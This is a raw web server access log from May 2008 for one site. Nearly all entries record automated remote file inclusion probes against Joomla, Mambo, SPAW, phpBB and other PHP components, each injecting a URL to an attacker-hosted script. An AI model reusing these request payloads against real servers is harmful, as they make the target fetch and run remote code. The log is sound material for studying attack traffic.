211.230.148.249 - - [16/May/2008:11:30:52 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:32:09 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:11:32:11 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.36 - - [16/May/2008:11:32:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [16/May/2008:11:32:25 -0700] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.1" 200 858 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:32:30 -0700] "GET /logs/access_080214.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:32:32 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:32:35 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:32:35 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:11:32:48 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:11:32:48 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:32:55 -0700] "GET /logs//citywriter/head.php?path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:32:55 -0700] "GET //citywriter/head.php?path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:33:31 -0700] "GET /logs/access_080308.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:33:46 -0700] "GET /logs//citywriter/head.php?path=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:33:46 -0700] "GET //citywriter/head.php?path=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:33:59 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:34:20 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:34:21 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:34:38 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:34:45 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:34:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:34:46 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:34:50 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:35:00 -0700] "GET //SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:35:01 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:35:16 -0700] "GET //admin/index.php?o=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:35:41 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:35:42 -0700] "GET //SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:35:44 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:35:45 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:35:45 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:35:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:35:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:35:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.23.154.168 - - [16/May/2008:11:35:47 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ppxp.ru/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
217.23.154.168 - - [16/May/2008:11:35:48 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ppxp.ru/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:36:00 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:36:01 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:36:01 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:36:23 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:36:24 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:36:24 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:36:24 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:36:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:36:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:36:29 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:11:36:32 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:11:36:32 -0700] "GET //SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:11:36:35 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:11:36:36 -0700] "GET //SQuery/lib/doom3.php?libpath=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:36:40 -0700] "GET /logs/access_071224.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:36:54 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:36:54 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:11:37:51 -0700] "GET //SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:11:37:51 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:38:10 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:38:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:38:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:38:13 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:38:13 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:38:13 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:38:34 -0700] "GET /protection.php?action=logout&siteurl=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:11:38:34 -0700] "GET /logs/protection.php?action=logout&siteurl=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:38:36 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:11:38:40 -0700] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:11:38:40 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:11:38:40 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:38:41 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:38:41 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [16/May/2008:11:38:42 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:38:43 -0700] "GET /logs/access_080117.log//admin/index.php?o=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:38:43 -0700] "GET /logs//admin/index.php?o=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.34.226.62 - - [16/May/2008:11:38:52 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.34.226.62 - - [16/May/2008:11:38:52 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:38:59 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:38:59 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:11:38:59 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:11:38:59 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:11:39:02 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:11:39:02 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:11:39:03 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:11:39:03 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.810" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:39:06 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:39:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:11:39:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:39:11 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:39:12 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:39:12 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:39:13 -0700] "GET /logs/access_080101.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:39:14 -0700] "GET /logs//popup_window.php?site_isp_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:39:15 -0700] "GET //popup_window.php?site_isp_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:39:18 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:39:24 -0700] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:39:25 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:39:25 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:11:39:41 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:39:41 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:11:39:41 -0700] "GET //SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:39:49 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:39:50 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:39:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:11:39:56 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:11:39:56 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:39:58 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:39:59 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:40:00 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:11:40:08 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:11:40:08 -0700] "GET //SQuery/lib/doom3.php?libpath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:40:14 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:11:40:14 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
